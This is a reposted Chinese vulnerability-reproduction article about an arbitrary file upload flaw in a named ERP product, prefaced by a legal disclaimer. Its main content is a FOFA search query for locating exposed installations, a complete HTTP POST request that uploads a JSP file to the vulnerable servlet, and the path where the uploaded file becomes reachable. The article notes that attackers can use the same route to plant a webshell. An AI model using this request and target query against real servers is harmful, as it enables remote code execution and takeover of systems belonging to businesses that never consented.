漏洞复现 || 某ERP系统任意文件上传

admin 2024年2月28日14:08:53评论43 views字数 1029阅读3分25秒阅读模式

免责声明

我爱林攻防研究院的技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!

漏洞描述

该ERP基于互联网技术采用多渠道模式进行营销服务管理体系,可整合线上及线下交易模式,覆盖企业多元化经营管理,该ERP存在漏洞任意文件上传,攻击者可通过该漏洞上传webshell木马来远程控制服务器。

漏洞复现 || 某ERP系统任意文件上传

资产确定

fofa:

 app="云时空社会化商业ERP系统"

漏洞复现

1.利用如下POC进行文件上传

POST /servlet/fileupload/gpy HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Content-Type: multipart/form-data; boundary=4eea98d02AEa93f60ea08dE3C18A1388Content-Length: 238

--4eea98d02AEa93f60ea08dE3C18A1388Content-Disposition: form-data; name="file1"; filename="check.jsp"Content-Type: application/octet-stream

<% out.println("This website has a vulnerability"); %>--4eea98d02AEa93f60ea08dE3C18A1388--

漏洞复现 || 某ERP系统任意文件上传

2.文件上传成功后路径为:/uploads/pics/上传日期/check.jsp

漏洞复现 || 某ERP系统任意文件上传

原文始发于微信公众号(我爱林):漏洞复现 || 某ERP系统任意文件上传

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月28日14:08:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 || 某ERP系统任意文件上传https://cn-sec.com/archives/2529917.html

发表评论

匿名网友 填写信息